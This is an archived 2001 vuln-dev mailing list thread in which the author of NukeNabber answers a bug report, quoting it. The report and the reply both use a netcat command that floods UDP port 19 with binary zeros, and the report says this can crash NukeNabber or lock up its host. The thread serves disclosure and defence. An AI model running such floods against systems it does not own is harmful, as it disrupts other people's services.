Vulnerability Development mailing list archives
Re: Bugs in NukeNabber 2.9b
From: "Daniel S. Otis-Vigil" <puppet () DYNAMSOL COM>
Date: Sun, 11 Feb 2001 23:35:58 -0700
First I would like to say it would have been nice if the author of this "bug" report had contacted me so I could tell him how to properly configure NukeNabber. You must set the option to "ignore" or close a port or you can flood the display. As you can see below, when set up properly it works fine and cannot be flooded. tray# nc -u -v -v 207.188.145.193 19 < /dev/zero toast.dynamsol.com [207.188.145.193] 19 (chargen) open sent 84738048, rcvd 0 [02/11/2001 23:32:42.921 GMT-0700] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:32:43.131 GMT-0700] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:32:43.171 GMT-0700] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:32:43.221 GMT-0700] UDP from address tray.dynamsol.com (207.188.145.195) remote port 32272 local port 19. [02/11/2001 23:32:43.311 GMT-0700] Port 19 (udp) is now disabled for 60 seconds. Daniel -----Original Message----- From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of s1gnal_9 Sent: Sunday, February 11, 2001 9:55 PM To: VULN-DEV () SECURITYFOCUS COM Subject: Bugs in NukeNabber 2.9b By default Nukenabber listens on port 19(udp) for connections, and gathers information on the source address... If we send binary zero's to it this is what we get *sends binary zeros* nc <target> 19 -u < /dev/zero *this appears on nukenabber* [02/11/2001 23:53:14.310 GMT-0500] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:53:14.310 GMT-0500] [02/11/2001 23:59:15.830 GMT-0500] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:59:15.830 GMT-0500] [02/11/2001 23:59:16.220 GMT-0500] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:59:16.220 GMT-0500] [02/11/2001 23:59:16.600 GMT-0500] Unable to determine source of connection on port 19 (udp). [02/11/2001 23:59:16.600 GMT-0500] As we can see, it cannot see where the data is coming from... In the past I have done tests and sent large amounts of data to this udp port and caused nukenabber to crash and sometimes lock up the system. -- _______________________________________________ Get your free email from http://sunos.com Powered by Instant Portal
Current thread:
- Bugs in NukeNabber 2.9b s1gnal_9 (Feb 11)
- Re: Bugs in NukeNabber 2.9b Daniel S. Otis-Vigil (Feb 14)